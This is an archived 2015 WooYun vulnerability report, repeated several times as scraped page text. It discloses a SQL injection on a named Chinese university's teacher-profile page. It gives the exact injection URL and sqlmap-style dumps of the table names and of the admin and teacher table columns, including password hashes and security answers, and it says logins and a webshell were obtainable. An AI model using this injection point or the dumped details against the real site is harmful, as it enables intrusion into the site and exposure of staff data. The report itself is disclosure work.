某高校站点存在sql注入,泄露教师资料 | wooyun-2015-0111163| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111163

漏洞标题：某高校站点存在sql注入,泄露教师资料

漏洞作者：孤风

提交时间：2015-05-26 14:37

修复时间：2015-05-31 14:38

公开时间：2015-05-31 14:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-26：细节已通知厂商并且等待厂商处理中
2015-05-31：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

sql注入

详细说明：

教师介绍页面出现sql注入

漏洞证明：

注入点

http://au.cug.edu.cn/jsxx/jsxx.php?mid=27

跑跑表

Database: autoxyweb
[90 tables]
+------------------------------+
| dede_addonarticle            |
| dede_addonimages             |
| dede_addoninfos              |
| dede_addonshop               |
| dede_addonsoft               |
| dede_addonspec               |
| dede_admin                   |
| dede_admintype               |
| dede_advancedsearch          |
| dede_arcatt                  |
| dede_arccache                |
| dede_archives                |
| dede_arcmulti                |
| dede_arcrank                 |
| dede_arctiny                 |
| dede_arctype                 |
| dede_area                    |
| dede_channeltype             |

字段

Database: autoxyweb
Table: dede_admin
[10 columns]
+-----------+------------------+
| Column    | Type             |
+-----------+------------------+
| email     | char(30)         |
| id        | int(10) unsigned |
| loginip   | varchar(20)      |
| logintime | int(10) unsigned |
| pwd       | char(32)         |
| tname     | char(30)         |
| typeid    | text             |
| uname     | char(20)         |
| userid    | char(30)         |
| usertype  | float unsigned   |
+-----------+------------------+

教师信息表

Column       | Type                  |
--------------+-----------------------+
 checkmail    | smallint(6)           |
 cs           | mediumtext            |
 email        | char(50)              |
 exptime      | smallint(6)           |
 face         | char(50)              |
 joinip       | char(16)              |
 jointime     | int(10) unsigned      |
 loginip      | char(16)              |
 logintime    | int(10) unsigned      |
 matt         | smallint(5) unsigned  |
 mid          | mediumint(8) unsigned |
 money        | mediumint(8) unsigned |
 mtype        | varchar(20)           |
 pwd          | char(32)              |
 rank         | smallint(5) unsigned  |
 safeanswer   | char(30)              |
 safequestion | smallint(5) unsigned  |
 scores       | mediumint(8) unsigned |
 sex          | enum('男','女','保密')    |
 spacesta     | smallint(6)           |
 uname        | char(36)              |
 uptime       | int(11)               |

其中一些还可以用密码去登陆教师管理系统,图片就不放了
后台发现是dedecms

获取webshell之后事就不做了

修复方案：

你们懂的

版权声明：转载请注明来源孤风@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-05-31 14:38

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111163

漏洞标题：某高校站点存在sql注入,泄露教师资料

相关厂商：中国地质大学

漏洞作者：孤风

提交时间：2015-05-26 14:37

修复时间：2015-05-31 14:38

公开时间：2015-05-31 14:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源孤风@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111163

漏洞标题：某高校站点存在sql注入,泄露教师资料

相关厂商：中国地质大学

漏洞作者： 孤风

提交时间：2015-05-26 14:37

修复时间：2015-05-31 14:38

公开时间：2015-05-31 14:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0111163"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 孤风@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：孤风

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源孤风@乌云